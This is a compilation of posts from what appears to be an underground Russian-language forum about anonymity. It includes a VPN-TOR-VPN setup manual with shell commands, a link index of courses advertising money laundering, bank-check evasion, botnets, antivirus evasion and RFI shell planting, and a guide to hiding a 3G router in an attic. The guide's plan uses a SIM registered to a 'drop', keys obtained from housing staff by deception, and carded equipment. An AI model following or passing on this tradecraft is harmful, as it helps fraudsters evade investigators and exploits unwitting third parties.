Память стирается (обнуляется), как только она освобождается как в распределителе страниц ядра низкого уровня, так и в распределителе кучи ядра более высокого уровня (slub). Это существенно сокращает срок службы конфиденциальных данных в памяти, устраняет уязвимости, связанные с использованием после освобождения, и делает большинство неинициализированных уязвимостей использования данных безвредными. Без наших изменений освобожденная память сохраняет данные на неопределенный срок до тех пор, пока память не будет передана для других целей и частично или полностью перезаписана новыми данными.
Выделение стека ядра обнуляется, чтобы устранить большинство неинициализированных уязвимостей в использовании данных.
Различное сокращение поверхности атаки за счет отключения функций или настройки инфраструктуры для динамического включения/отключения их только по мере необходимости (perf, ptrace).
Включены различные функции повышения надежности восходящего потока, в том числе многие из которых мы приняли участие в разработке и внедрении в восходящем потоке в рамках нашего проекта, основанного на Linux (который мы намерены снова возродить как более активный проект).
Предотвращение динамического выполнения машинного кода в памяти или через файловую систему для базовой ОС без использования диспетчера пакетов и т.д.
Ужесточение доступа к файловой системе
Улучшенная проверенная загрузка с улучшенными свойствами безопасности и уменьшенной поверхностью атаки
Улучшенная аттестация на основе аппаратного обеспечения с более точной информацией о версии
Устраняет оставшиеся пробелы для приложений для доступа к идентификаторам на основе оборудования
Значительно уменьшена поверхность удаленной, локальной и бесконтактной атаки за счет удаления ненужного кода, добавления дополнительных функций и отключения дополнительных функций по умолчанию (NFC, Bluetooth и т. Д.), Когда экран заблокирован (подключение новых периферийных устройств USB, доступ к камере) и, возможно, после тайм-аута (Bluetooth, Wi-Fi).
Возможность отключить встроенную отладку (ptrace), чтобы уменьшить локальную поверхность атаки (по-прежнему включена по умолчанию для совместимости)
Низкоуровневые улучшения шифрования полного диска на основе файловой системы, используемого в современном Android
Поддержка выхода из профилей пользователей без использования диспетчера устройств: делает их неактивными, чтобы они не могли продолжать выполнение кода при использовании другого профиля, и удаляет ключи шифрования диска (для каждого профиля) из памяти и аппаратных регистров
Опция, позволяющая автоматически перезагружать устройство, когда ни один профиль не был разблокирован в течение заданного периода времени, чтобы снова полностью перевести устройство в режим покоя.
Индикаторы активного использования камеры и микрофона включены по умолчанию наряду с традиционным индикатором местоположения
Улучшена видимость пользователем постоянной безопасности встроенного ПО благодаря проверке версии и конфигурации с включением отчетов о несоответствиях и функций отладки.
Поддержка более длинных паролей по умолчанию (64 символа) без диспетчера устройств
Более строгая реализация дополнительной функции разблокировки отпечатков пальцев, позволяющей только 5 попыток, а не 20, перед постоянной блокировкой (наша рекомендация по-прежнему хранить конфиденциальные данные в профилях пользователей без разблокировки отпечатков пальцев)
Опция скремблирования PIN-кода
Режим только для LTE для уменьшения поверхности атаки сотовой радиосвязи за счет отключения огромного количества устаревшего кода
Опция рандомизации MAC для каждого подключения (включена по умолчанию) как более частная опция, чем стандартный постоянный случайный MAC для каждой сети.
Когда используется рандомизация MAC-адресов для каждого подключения, добавленная GrapheneOS, состояние DHCP-клиента сбрасывается перед повторным подключением к сети, чтобы избежать выявления того, что это, скорее всего, то же устройство, что и раньше.
Улучшенные адреса конфиденциальности IPv6 для предотвращения отслеживания в сетях
Ванадий: закаленное веб — представление и браузер по умолчанию-веб- представление-это то, что большинство других приложений использует для обработки веб-контента, поэтому вы получаете выгоду от ванадия во многих приложениях, даже если вы выбираете другой браузер
Проверка и мониторинг безопасности на основе аппаратного обеспечения: приложение Auditor app и служба аттестации обеспечивают надежную аппаратную проверку подлинности и целостности встроенного ПО/программного обеспечения на устройстве. Используется надежный подход, основанный на сопряжении, который также обеспечивает проверку подлинности устройства на основе аппаратного ключа, сгенерированного для каждого сопряжения. Проверки на основе программного обеспечения накладываются сверху, а доверие надежно связано с оборудованием. Для получения более подробной информации см. страницу "О программе" и учебное пособие.
Просмотрщик PDF: изолированный, защищенный просмотрщик PDF с использованием рендеринга HiDPI с уменьшением масштаба, выделением текста и т.д.
Зашифрованные резервные копии с помощью интеграции приложения Seedvault с поддержкой локальных резервных копий и любого поставщика облачных хранилищ с приложением поставщика хранилища
Безопасная система создания приложений, позволяющая избежать совместного использования макета адресного пространства и других секретов между приложениями
Переключатель сетевых разрешений позволяет запретить как прямой, так и косвенный доступ к любой из доступных сетей. Локальная сеть устройства (localhost) также защищена этим разрешением, что важно для предотвращения использования приложений для связи между профилями. В отличие от реализации на основе брандмауэра, переключатель сетевых разрешений запрещает приложениям использовать сеть через API, предоставляемые операционной системой или другими приложениями в том же профиле, если они помечены соответствующим образом.
Стандартное разрешение на доступ в Интернет, используемое в качестве основы для переключения сетевых разрешений, дополнено вторым уровнем принудительного применения и надлежащей поддержкой для предоставления/отзыва его на основе каждого профиля.
Переключение разрешений датчиков: запретить доступ ко всем другим датчикам, не охватываемым существующими разрешениями Android (Камера, микрофон, Датчики тела, распознавание активности), включая акселерометр, гироскоп, компас, барометр, термометр и любые другие датчики, присутствующие на данном устройстве. Чтобы избежать нарушения совместимости с приложениями Android, добавленное разрешение включено по умолчанию.

Этот дистрибутив может быть установлен только на телефонах Pixel из-за использования специальных чипов безопасности, которые входят только в линейку Pixel.

[мануал] VPN-TOR-VPN/double VPN за 5 минут

ID: 676533bbb4103b69df371a59
Thread ID: 65193
Created: 2022-04-04T08:16:54+0000
Last Post: 2023-05-25T07:35:10+0000
Author: AngelStar
Replies: 24 Views: 4K

Недавно в ходе обсуждения впсок и прочего попросили меня написать про то, как быстро сделать впн-тор-впн или впн-впн. Читаем, комментируем)

Установка OVPN:

Скачиваем скрипт
curl -O[ https://raw.githubusercontent.com/angristan/openvpn- install/master/openvpn- install.sh](https://raw.githubusercontent.com/angristan/openvpn- install/master/openvpn-install.sh)
Запускаем его
chmod +x openvpn-install.sh
./openvpn-install.sh

Далее идем по нему, там всё наглядно и понятно
Рекомендации: в шифровании AES-256, пароль на пользователя, ОБЯЗАТЕЛЬНО tcp соединение!
Конфиг для подключения к серверу будет в текущей директории с именем <имя пользователя>.ovpn

Установка тор:
apt-get install tor (запустится как служба по умолчанию, порт 9050)

Делаем клиент:
Скачиваем любой конфиг к бесплатному OVPN серверу, добавляем к нему строку (ЕСЛИ ХОТИМ VPN-VPN - не добавляем!):
socks-proxy 127.0.0.1 9050

Заливаем на vps в папку /etc/openvpn/client с именем client.conf

Настраиваем маршрутизацию, чтобы сохранить доступ по белому ip:
ip rule add from table 15
ip route add default via table 15

Запускаем клиент:
service openvpn-client@client start

Проверяем статус клиента (Должны увидеть строку Initialisation sequense complete):
service openvpn-client@client status

Если статус сервера будет dead , ничего страшного. Главное, чтобы в выводе netstat висел указанный для сервера порт

Чистим iptables и прокидываем перенаправление трафика на клиент с сервера
iptables -F
iptables -I FORWARD -i tun1 -o eth0 -j ACCEPT
iptables -I FORWARD -i eth0 -o tun1 -j ACCEPT
iptables -t nat -A POSTROUTING -o tun1 -j MASQUERADE

Скачиваем конфиг клиента нашего сервер (будет в той директории, откуда скрипт для установки запускали), подключаемся и проверяем через tracer (для Windows), traceroute (для Linux)
Должны увидеть сначала ip нашего vpn сервера, потом ip бесплатного vpn сервера
При этом, задержка до бесплатного vpn сервера должна быть значительно больше, чем до нашего (за счет использования tor)
**
ГОТОВО!)**

Raspbbery Pi + OpenWRT + Socks5

ID: 676533bbb4103b69df371a77
Thread ID: 76811
Created: 2022-11-27T18:57:07+0000
Last Post: 2023-04-08T22:32:11+0000
Author: BLUA
Replies: 50 Views: 4K

Есть малинка на 4 гб памяти, openWRT встал легко и нормально сразу заработал, начав раздавать вайвай.
В самой OpenWRT есть возможность воткнуть впн и раздавать wifi с vpn.
Но как реализовать раздачу прокси ? Точно же уже кто-то сталкивался с этой задачей...

можеть есть какой-то софт? или мб плагины для openWRT?

Сборник мануалов на любой цвет и вкус

ID: 676533bbb4103b69df371aeb
Thread ID: 53242
Created: 2021-06-23T15:14:41+0000
Last Post: 2022-07-26T04:39:10+0000
Author: Tensive Tennesi
Prefix: Мануал/Книга
Replies: 7 Views: 4K

Содержание статьи:
Глава 1. Начало. Взлом Wi-Fi сети.
Глава 2. Угостите сигареткои??
Глава 3. Linux – наше все??
Глава 4. VPN – а какои? он?
Глава 5. Обширная инструкция по установке VirtualBox и Whonix.
Глава 6. Настрои?ка Jabber клиентов для максимально комфортного и анонимного общения.
Глава 7. Базовая анонимность Android смартфона для использования Jabber и Telegram.
Глава 8. Контролируем трафик Whonix’а.
Глава 9. Настрои?ка Mozilla Firefox вне виртуальной машины.
Глава 10. Анонимная валюта: криптовалюта. Миксинг средств.
Глава 11. ВЫРЕЗАНО!
Глава 12. Подключение к RDP на Whonix и конец истории Михаила.
Глава 13. Зарождение новои? власти.
https://cloud.mail.ru/public/FXCA/a3SxkoSVz

Курс по анонимности 2019

https://cloud.mail.ru/public/2yWK/3nJhgMaJv/

Часть 1: https://cloud.mail.ru/public/3oZZ/3hoh7m8YS/
Часть 2: https://cloud.mail.ru/public/MHfT/oaQDFtp7Z/

Безопасность:

Настраивать анонимную и безопасную систему
Обналичивать грязные и серые денежные поступления
Обходить банковские проверки
Скрывать подмену fingerprint и IP
Настраивать безопасность системы виртуализации
Шифровать трафик и защищаться от перехвата
Перехватывать трафик в TOR
Владение нашими персональными софтами
Обрести знания по векторам атак и мерами их предотвращения
Создавать изолированную сеть без любых утечек трафика
и многое другое

Хакинг:

Искать уязвимости методом фаззиннга
Вытягивать Базы Данных и монетизировать данные
Владеть Linux
Массовый сбор серверов
Лить шеллы эксплуатируя Remote File Include
Получать доступы к серверам
Автоматизировать работу
Поднимать свой DNS и лить на него трафик
Поймешь, что данные — самое дорогое в мире и будешь их монетизировать
Работать по трафику

Вирусология:

Настраивать и использовать вирусы
Превращать загрузки в деньги
Разбираться в вирусах
Обходить антивирусы
Создавать и контролировать ботнет
Управлять машиной после заражения
Зачищать следы после атаки

Соц. инженерия:

Находить подходы к людям
Понимать паттерны поведения
Входить в доверие
Манипулировать поведением
Зарабатывать на хайпах
Составлять планы атаки
Избегать основных ошибки

https://cloud.mail.ru/public/4Wwk/2pbE5ZtZG/

https://www.youtube.com/channel/UCQ4rZRBcljSwdE8hl4JVZAA

Администратор Linux. Часть 1,2,3 (2020)

Что даст вам этот курс

Знание архитектуры Linux.
Освоение современных методов и инструментов анализа и обработки данных.
Умение подбирать конфигурацию под необходимые задачи, управлять процессами и обеспечивать безопасность системы.
Владение основными рабочими инструментами системного администратора.
Понимание особенностей развертывания, настройки и обслуживания сетей, построенных на базе Linux.
Способность быстро решать возникающие проблемы и обеспечивать стабильную и бесперебойную работу системы.

Необходимые знания

Понимание основ сетей: адресация и статический роутинг в сетях на базе IPv4.
Опыт установки системы Linux и настройки своего рабочего места (проходить курс лучше всего на своей машине с ОС Linux).
Опыт установки систем виртуализации: VirtualBox или что-то kvm-based.

Программа:

1) С чего начинается linux.
2) Дисковая подсистема.
3) Файловые системы и LVM.
4) Загрузка системы.
5) Инициализация системы. Systemd и SysV.
6) Bash, awk, sed, grep и другие.
7) Управление пакетами. Дистрибьюция софта.
8) Управление процессами.

1) Web сервера.
2) PostgreSQL.
3) Динамический веб контент.
4) PostgreSQL cluster.
5) Mysql.
6) Mysql - бэкап, репликация, кластер.
7) Redis, Memcached, RabbitMQ.

1) Архитектура сетей.
2) Фильтрация трафика.
3) LDAP. Централиованная авторизация и аутентификация.
4) Статическая и динамическая маршрутизация.
5) DNS/DHCP - настройка и обслуживание.
6) Мосты, туннели и VPN.
7) Сетевые пакеты. VLAN 'ы LACP.
8) IPv6.

1) Docker.
2) Автоматизация администрирования. Ansible.
3) SELinux - когда всё запрещено.
4) Механизмы изоляции и аккаунтинга Linux (namespaces и cgroups).
5) Пользователи и группы. Авторизация и аутентификация.
6) Мониторинг производительности.
7) Сбор и анализ логов.
8) Мониторинг и алертинг.
9) Резервное копирование.

Часть 1
https://href.li/?https://cloud.mail.ru/public/ErSF/Nq8G4uFfg
https://cloud.mail.ru/public/ErSF/Nq8G4uFfg

Часть 2

https://cloud.mail.ru/public/2CJG/2WRvReyck

Часть 3

https://cloud.mail.ru/public/thUT/45nXa1cYf

https://mega.nz/file/giRzSAwb#APwPJsvbA05XTkV_cjB14rQMUaXuR9ZMlKJ4SAkMcgo

Paranoid II — курс по анонимности и безопасности (2020)

Paranoid II — логическое продолжение курса по анонимности в сети Paranoid

Инструктор: ghost
О чем курс: о комплексе мер по защите информации, конфиденциальности, защите персональных данных, анонимности в интернете и не только ...;
Для кого этот курс: для людей, нуждающихся в высокой степени конфиденциальности и защите информации;
Предоставим: доступ к видео и текстовым материалам, а так же персональные консультации в рамках курса;
Что еще: практические задания к каждому уроку.

Продолжительность обучения 1 месяц. Мы даем доступ на 3 месяца для полного погружения в тему.
Внимание! Доступ к урокам предоставляется последовательно, по мере их прохождения. Чтобы получить очередной урок, надо выполнить тестовое задание по предыдущему материалу.
Курс состоит из 10 уроков:

Настройка рабочего окружения. Улучшенная и переработанная работа с виртуальными машинами (пожалуй, единственная аналогия с предыдущим курсом);
Тонкая работа с разными криптовалютами;
Выбор, аренда, администрирование и защита VPS (70% работы в курсе проходит на серверах);
Подъём и настройка сервисов на VPS и работа с ними;
Тонкая работа с Tor-сервисами;
Выжимаем максимум из Raspberry Pi;
Анонимные роутеры;
Подъём, настройка и администрирование Tor-ноды;
Работа с железом ПК. Удаление аппаратных закладок;
Минимизация рисков и... авторские разработки.

https://cloud.mail.ru/public/yrpP/ZEdBS6Hk3/

https://anonfiles.com/V4a578G2pc/AnonymousHandbook_pdf

Kali Linux Tools

https://speakerd.s3.amazonaws.com/presentations/80cbc6f0906d01307a226eeb2b1ed4e7/Kali.pdf

Готовые связки
- Схемы сохранения анонимности в сети
- Связка vpn+tor+vpn (windows)
- Связка tor+ssh (windows)
- Как пустить весь трафик через Tor (windows)
- Как пустить весь трафик через Tor (mac)
- Как подключиться к telegram через тор
- Как подключиться к дедику через тор
- Связка tor+ssh через Double SSH Tunnel Manager (windows)
- Связка tor+ssh (linux)
- Связка tor+ssh (Tails)
- Связка vpn+tor+vpn (linux)
- Связка ssh+ssh+ssh
Как безопасно обналичить деньги
- Как безопасно обналичить деньги
- Безопасный обнал $$$
- Виртуальный номер (IP-телефония, VoIP, SIP-телефония)
Настройка безопасной системы
- Настройка безопасной системы
- Вебинары по информационной безопасности
Безопасное удаление данных
- Безопасное удаление данных в Windows
- Безопасное удаление данных в Mac
Безопасность Android
- Шифрование звонков в Android
- Шифрование сообщений в Android
- Блокировка трафика в обход в VPN
- Mock Locations (спуфинг геолокации)
- Смена IMEI by "симка"
- Смена IMEI (XPOSED IMEI Changer Pro)
- Android-IMSI-Catcher-Detector (защита от подмены базовой станции)
- Mac Address Ghost (смена mac)
- SetMacAddress (смена mac)
- Stagefright Detector (проверка уязвимости Stagefright)
- Orbot (tor на android)
- DroidWall (android firewall)
- SnoopSnitch (обнаружение IMSI-ловушек)
- Создание VPN L2TP/IPsec
- Настройка фаервола DroidWall
- Kali Linux NetHunter
- Copperhead OS
- Blackphone 2.0
Безопасность iPhone
- Как зашифровать iPhone
- Шифрование сообщений в iPhone
Виртуальные машины
- Установка виртуальной машины VMware Workstation
- Установка windows в Virtual Box
- Загрузка VirtualBox с внешнего usb диска
- Как запустить антидетект 5
- Софт для виртуальной машины
- Подмена WebRTC
Почта
- Почта на 10 минут
- ProtonMail
- Tutanota
- Сравнение защищенности почты
Сервисы секретных заметок
- privnote.com
- onetimesecret.com
- secserv.me
- cryptorffquolzz6.onion (через тор)
SSH туннели
- SSH туннели
- Использование Bitvise
- Socks прокси сервер через SSH тоннель
- Как использовать tor вместе с ssh
- Как создать цепочку из нескольких ssh
Дедики
- Как подключиться к дедику через тор
- Где купить дедик
- FAQ по дедикам
- Работа с дедиками
- Вопросы по дедику
- Бесплатная раздача дедиков
Vpn
- Как поднять собственный vpn на сервере
- Как пустить весь траффик через vpn
- Как пустить весь траффик через vpn (android)
- Как пользоваться vpn
- Бесплатный vpn
- Сравнение vpn
- Как проверить анонимность vpn сервера
- Связка vpn+tor+vpn (windows)
- Связка vpn+tor+vpn (linux)
Прокси
- Как пустить трафик через прокси
Jabber
- Как шифровать переписку в Jabber
- Настройка OTR шифрование Pidgin
- Настройка OTR шифрование Psi
- Настройка OTR шифрование Adium
- Настройка TLS шифрования Pidgin
- GPG4Win установка и настройка
- Установка джабера на флешку
Socks (соксы, носки)
- Настройка firefox для работы вместе с socks 5
- Что такое носки и как настроить проксификатор
Зашифрованный контейнер
- Установка TrueCrypt на флешку
- Создание контейнера с двойным дном
Браузеры/Тор
- Безопасная настройка Flash Player
- Настройка Google Chrome через сеть Tor
- Анонимный браузер на движке Google Chrome
- Tor скачать
- Настройка Tor
- Как использовать tor вместе с ssh
- Как подключиться к дедику через Tor
Плагины для браузера firefox
- Adblock Plus
- AmIUnique
- BetterPrivacy
- Disconnect
- HTTPS Everywhere
- Lightbeam
- Modify Headers
- NoScript
- Privacy Badger
- Self-Destructing Cookies
- uBlock Origin
- User Agent Switcher
- WebRTC Control
- FP-Block
Linux
- Безопасная работа под Linux
Оффлайн безопасность
- Защищенные флеш накопители
- Realistic Masks
Софт
- GlassWire (монитор сетевой безопасности)
- Intercepter-NG (снифер wi-fi)
- SoftPerfect WiFi Guard (защита Wi-Fi)
- Список MAC адресов
- Сервис расшифровки хэшей
- HitmanPro (антивирусный сканер)
- Arpoison (arp spoofing)
Проверка системы
- whoer.net
- ip-score.com
- check2ip.com
- whatleaks.com
- Advertising ID (уникальный отпечаток)
- Canvas Fingerprinting (уникальный отпечаток)
- fingerprintjs (идентификатор виртуальной машины)
Bitcoin
- Как открыть кошелек Bitcoin
- Работа с bitcoin
Прочее
- Безопасность в сети интернет
- Как сохранить анонимность в сети
- Форензика – компьютерная криминалистика
- Организация расследования хищений денежных средств, совершаемых с использованием компьютерных технологий
Google
- История перемещений
- Рекламные предпочтения
- История поиска
- Список устройств, получавших доступ к аккаунту
- Список всех приложений и расширений, обращающихся к вашим данным
Анонимная фриланс биржа
- Yukon
Безопасные OS
- Как установить на флешку Tails
- Установка и настройка ОС Whonix
- Qubes OS
- Liberte Linux
- Subgraph OS
Видео курсы
- Курс по анонимности и безопасности Linux
Видео курсы (Vector)
- Методы деанонимизации пользователей и защита от них
- Схемы сохранения анонимности в сети
- Антидетект виртуальной машины
- Антидетект виртуальной машины (продолжение)
- Криминалистический анализ популярных мессенджеров. Ответы на вопросы
- Деанонимизация пользователей ТОR сети и перехвата их данных
- Практика по деанонимизации и перехвату трафика в сети ТОР
- VPN и DNS
- Перехват, анализ и модификация трафика на сервере OpenVPN
- Как Следят за пользователями Linux и Mac OS
- Kali Linux (1-й вебинар)
- Kali Linux (2-й вебинар)
- Система CDAMS, Логи системы Windows, WebRTC
- OsmocomBB (1 вебинар)
- OsmocomBB (2 вебинар)
- Создание боевой машины на базе Android (Вебинар 1)
- Создание боевой машины на базе Android (Вебинар 2)
- Создание боевой машины на базе Android (Вебинар 3)
- Взлом криптоконтейнера (вскрытие контейнера TrueCrypt)
- Настройка анонимного и безопасного браузера (1 часть)
- Настройка анонимного и безопасного браузера (2 часть)
- Защита от перехвата данных в Wi Fi сети
- Взлом и защита роутера
- Вирусология (Часть 1)
- Вирусология (Часть 2)
- Вебинар для пользователей moneymaker
- Вебинар для пользователей darkmoney
- Информационная безопасность. Ответы на вопросы
- Деанон скайпа, гугла, перехват СМС и звонков
- Анонимные звонки, мобильная связь, VOIP, GSM шлюз
- Взлом компьютерных систем, пентестинг
Аудио курсы (Теодор Бодлер)
- Теодор Бодлер: курс по анонимности и безопасности
- Теодор Бодлер: Курс по кредитам и атм картам
- Анонимный вывод средств
- Курс по анонимности и безопасности в сети
- Как поднять собственный vpn на сервере
- Как создать цепочку из нескольких ssh
- Как подключиться к дедику через тор

Тема с перепрошивкой 4G модема, установкой направленной антенны, но только не на роутер а на базовую станцию сотового оператора, таким образом вы можете выскочить за пределы соты в которой фактически находитесь, а тем кто живет в приграничных местах, необходимо приобрести симку из соседнего государства и ловить соответственно базу загран сотового оператора. В общем если по всей цепочке впнов носков и прочих хайдов доберутся до номера будут искать за границей хрен пойми кого.
Как известно у 3g множетсво плюсов но есть главный минус-это возможность беспроблемной пеленгации (Хотя многие и говорят,что никто не будет заморачиваться,но тем не мение возможность существует)
Не буду говорить о том что и модем и симка должны быть куплены и оформлена на дропа/алкоголика.

Ну что,догадываетесь в чем дело? Еще нет?

Т.е получив доступ на чердак/крышу/квартиру в любом месте,где есть прием 3g
Устанавливаете роутер,настраиваете и наслаждаетесь интернетом.
Так ,скажете вы, но все равно безопасность сомнительная, ведь радиус действия Wi-Fi совсем небольшой.
Вот здесь нам и прийдет на помощь направленная Wi-Fi антена (погуглите-в интернете огромное кол-во рецептов по изготовлению или же купите/скардите для себя) при помощи которой при прямых руках и должном опыте сможете находиться до 2-10 км от вашего роутера с 3g модемом.

В общем подробная инструкция:
Что потребуется: 3g модем,симка,роутер (В моем случае D-link Dir-320,так как показал себя довольно хорошо и легок в настройке)
Сам план:
1)Перешиваем и настраиваем роутер оффициальной прошивкой с поддержкой 3g (легко находиться в гугле,сейчас лень искать)
3)Ищем чердак/крышу и получаем туда доступ.
Получить доступ на них на самом деле просто.Вот один из вариантов:
Приходим в ЖЭК,улыбаемся,одариваем комплиментами местны контингент и просим дать нам ключи от чердака для того чтобы поправить/установить спутниковую параболическую антену(в простонардоье-тарелка).
Очень желательно сделать дубликат, чтобы в случае чего всегда иметь доступ.
3)Пробираемся на чердак, желательно прихватив ноутбук, устанавливаем роутер
Проверяем раздачу интернета.Если все в порядке,то действуем дальше.
4)(Если необходимо)Рассчитываем/подбираем методом тыка место установки предварительно изготовленной антены для роутера, после чего закрепляем ее, подключаем к роутеру и просим товарища либо сами проверяем коннект на месте дислокации(т.е там,где будете работать).
5)Желательно взять любой ИБПшник, чтобы сберечь бп роутера(который часто страдает от скачков напряжения) и металлический ящик подходящего размера,куда все аккуаратно складываем,желательно прокладывая поролоном(далеко не обязательно,но чтобы зимой не мучиться лучше сделать) и закрепляем в нужном месте.
Еще раз проверяем коннект и закрываем чердак.
Все,теперь можете спать чуть спокойнее,так как даже в случае пеленгации выйдут на чердак,где в худшем случае найдут только роутер и модем.
P.S Понятно,что это далеко не панацея,но для тех кто пользуется 3g лишний способ обезопасить себя.
Удачи на невидимом фронте!
З.Ы Для Йоты есть аналог,Yota Egg-раздает Yota интернет через Wi-Fi

Как работает VPN - TOR - VPN, и зачем это вообще нужно

ID: 676533bbb4103b69df371b3e
Thread ID: 63133
Created: 2022-02-17T23:18:13+0000
Last Post: 2022-02-20T15:11:28+0000
Author: snape81
Prefix: Статья
Replies: 20 Views: 4K

В этой статье я расскажу о нескольких цепочках построения анонимности в сети, информация в большей степени ориентирована на новичков

Многие считают, что голый TOR-браузер на windows 10 гарантирует полную анонимность и безопасность, но на самом деле это не больше, чем миф. Для обеспечения более высокого уровня анонимности следует поставить open-source (открытый исходный код) хост систему, не устанавливая на неё приложения с закрытым исходным кодом, также работа должна вестись исключительно с виртуальной машины, весь трафик которой прогоняется через сеть TOR. Отличным примером послужит Whonix, где в качестве проводника в интернет выступает шлюз Gateway, о всех преимуществах и установке подобного рабочего пространства я рассказывать не буду, об этом уже достаточно статей на форуме. Скажу лишь то, что благодаря Whonix мы можем реализовать самые разные цепочки анонимности, о них, а также об их преимуществах и недостатках, я и хочу рассказать.

TOR

Небольшой экскурс в работу самой сети, перед самим выходом в интернет мы подключаемся к трём случайным нодам (серверам), где на первую ноду прилетает трафик, который покрыт тремя слоями шифрования, каждая нода может снять только верхний слой, следовательно, первая нода снимает первый слой, второй - вторая и третий - третья, выходит такой момент, что трафик на 3-й финальной ноде не зашифрован. То есть, человек, который держит эту ноду может видеть наш трафик, наши сообщения и так далее, но он не знает, кто отправитель. Поэтому пользуясь TORом не следует передавать никаких "чувствительных" данных, но также следует ремарка, если мы благодаря TORу зашли в обычный интернет, а не в onion-сеть, то большинство сайтов работают на протоколе HTTPS, следовательно, наш трафик шифруется даже на выходе из 3-й ноды, и потенциальный злоумышленник его не посмотрит, но если сайт работает на протоколе HTTP... думаю объяснять не нужно =) Не стоит пренебрегать этим фактом, так как exit (третьи) ноды очень часто держат не самые доброжелательные люди, в частности и те, кто носит погоны. Даже если мы заходим на сайты, которые работают по протоколу HTTPS, это не всегда может быть самым надёжным решением, а если трафик шифруется средствами VPN, то этот вариант выглядит куда более надёжным.

Также наш провайдер видит, что мы используем TOR, казалось бы, видит он и видит, но с недавних пор TOR в РФ вообще заблокирован, наверняка это от большой любви к нему) Также входная (первая) нода знает наш реальный IP. Последнее, что можно добавить, все сайты на которые мы заходим (очевидно, не в onion пространстве) видят, что используется TOR, и практически никто такой подход не приветствует, из-за чего следует огромное количество ограничений, вводов капчи и прочего геморроя.

Стоит отметить, что в onion пространстве никак не избежать той или иной утечки трафика на exit ноде, но узнать отправителя у неё не получиться, поэтому при работе в "дарке" никогда не следует передавать "чувствительные" данные.

Подведем итоги:
- Трафик не зашифрован на выходе (при работе в onion сети это не предотвратить), следовательно, злоумышленник может перехватить ту или иную информацию, если пользователь использует незащищенный протокол
- Провайдер видит, что мы используем сеть TOR, а также продолжительность нашего использования этой сети
- Входная нода знает наш реальный IP
- Посещаемые ресурсы видят грязный IP сети TOR
1.cleaned.png
VPN - TOR

Благодаря VPNу, который стоит перед TORом наш провайдер не увидит, что мы пользуемся сетью TOR, а если мы живём в России, то таким нехитрым образом мы обходим блокировку этой сети. Однако, теперь провайдер будет видеть, что мы пользуемся VPNом, так как мы постоянно подключены к одному и тому же IP- адресу, но при этом на данный момент факт использования VPN не вызывает большого подозрения, скорее вообще никакого. Но все проблемы на выходе пока остаются.
2.cleaned.png
TOR - VPN

При работев таком режиме получается ситуация, где владелец exit ноды сможет увидеть, что трафик полетел на определённый сервер, но сам трафик он прочитать не сможет, естественно, если это не onion сеть. Также все сайты, на которые мы заходим, будут видеть на выходе белый IP-адрес, да, антифорд системы могут позволить определить, что мы используем VPN, но в 99% это не вставляет никаких палок в колёса. При использовании данной связки наш провайдер увидит использование сети TOR, плюс входная нода знает реальный IP.

Как видно на рисунке, момент, где трафик идёт от VPN до того или иного ресурса не зашифрован, тут всё зависит от сервиса, которым Вы пользуетесь, допустим, это сайт, работающий по HTTP, то есть трафик не шифруется, следовательно, Вы должны доверять тому VPN, которым пользуетесь, так как в данной ситуации именно он получит доступ к этим данным, а не exit нода, что уже куда лучше.
3.cleaned.png
VPN -TOR - VPN

Как вишенка на торте, связка VPN - TOR - VPN, она объединяет все преимущества двух предыдущих связок.

Подведём итоги:
- Трафик зашифрован на выходе
- Провайдер НЕ видит, что мы используем сеть TOR
- Входная но да НЕ знает наш реальный IP
- Посещаемые ресурсы видят белый IP
4.cleaned.png

Я подробно расписал преимущества и недостатки нескольких цепочек реализации анонимности. Уточню, что под словом VPN я не имею в виду какую-то бесплатную хрень, самым лучшим вариантом всегда было и будет поднять свой VPN сервис, например, используя OpenVPN, есть куча статей на этом форуме, как и в общем в интернете, где без особых проблем и сложностей рассказывается, как развернуть VPN на удалённом сервере. Спасибо за внимание!

Что видит ваш провайдер при подключении к VPN серверу ?!

ID: 676533bbb4103b69df371b58
Thread ID: 55422
Created: 2021-08-17T09:30:10+0000
Last Post: 2022-01-21T20:06:18+0000
Author: SUSPENSE
Prefix: Статья
Replies: 11 Views: 4K

Думаю, никому из читающих данную тему не стоит объяснять что такое VPN...
Но часто, подключаясь к серверам из разных точек мира, мы даже не задумываемся, что же видит наш провайдер
(далее ISP)
**Сегодня мы об этом поговорим.

Как работает ваш провайдер?
ISP (Internet Service Provider) - организация, предоставляющая пользователям доступ к сети Интернет и связанные с этим услуги.

Схема работы:

**С этим разобрались, едем дальше.

Что видит ISP при подключении к VPN**

• Как только вы подключитесь к VPN серверу, ISP увидит подключение и данные о сервере (а именно IP-адрес сервера и его порт) но не будет знать что вы, например, гуглите, или какие страницы посещаете.
• Провайдер сможет понять тип (L2TP/IPsec, PPTP, SSTP) и объём данных, но не сможет прочитать их, так-же для него будет известно время подключения к интернету и выхода из него.
Стоит отметить, что конфиденциальная информация для ISP будет также недоступна.

Что провайдер не сможет прочитать:**

сайты, которые вы посещали
файлы, которые вы скачивали
что вы публиковали в социальных сетях
историю поиска.

Более детальная настройка файервола Agnitum для достижения максимальной безопасности

ID: 676533bbb4103b69df371b5f
Thread ID: 50533
Created: 2021-04-10T18:47:14+0000
Last Post: 2022-01-12T09:40:08+0000
Author: Benihowy
Prefix: Статья
Replies: 18 Views: 4K

Среди разнообразия ПО, нацеленного на защиту, хочу обратить внимания на этот продукт. Он имеет довольно тонкую настройку и при определенных знаниях пользователя способен показать высокий результат в защите как реальных так и виртуальных машин. Программа на первый взгляд довольно сложна. Для каждой программы нужно прописывать правила. Разумеется, есть так называемый режим «автообучения», который по факту разрешает почти любой исходящий трафик для всех программ. С точки зрения безопасности - это безрассудно и требует ручной правки каждого правила.

Рассмотрим главное окно программы

Полагаю, в этом окне все понятно. Тут отображается весь трафик, генерируемый приложениями.

**Рассмотрим важные настройки программы

- Общее.** В этой вкладке можно указать, как будет загружаться файервол и его служба. Также включить или выключить внутреннюю защиту. Защита служит от несанкционированного отключения службы

- Конфигурация. Здесь можно сохранить конфигурацию и загрузить

- ImproveNet. Автоматическое создание всех правил. Полезно при первой установке и при перезагрузке, чтобы собрать всю информацию про активность приложений. Но рекомендуется после выключать

- Правила для приложений. Самая важная настройка, которая охватывает почти всю сетевую активность всей системы

Цветовая политика тут довольно проста. Красный цвет – полный запрет, зеленый полное разрешение, желтый – согласно правилам. Если нажать на приложения можно редактировать правила для этого приложения. В вкладке «общее» как раз и настраивается цветовая политика что показана была на предыдущем скриншоте

5.1.png

Вкладка «anti-leak» настраивает политику разрешения либо запрещения взаимодействия приложения с системой

5.2.png

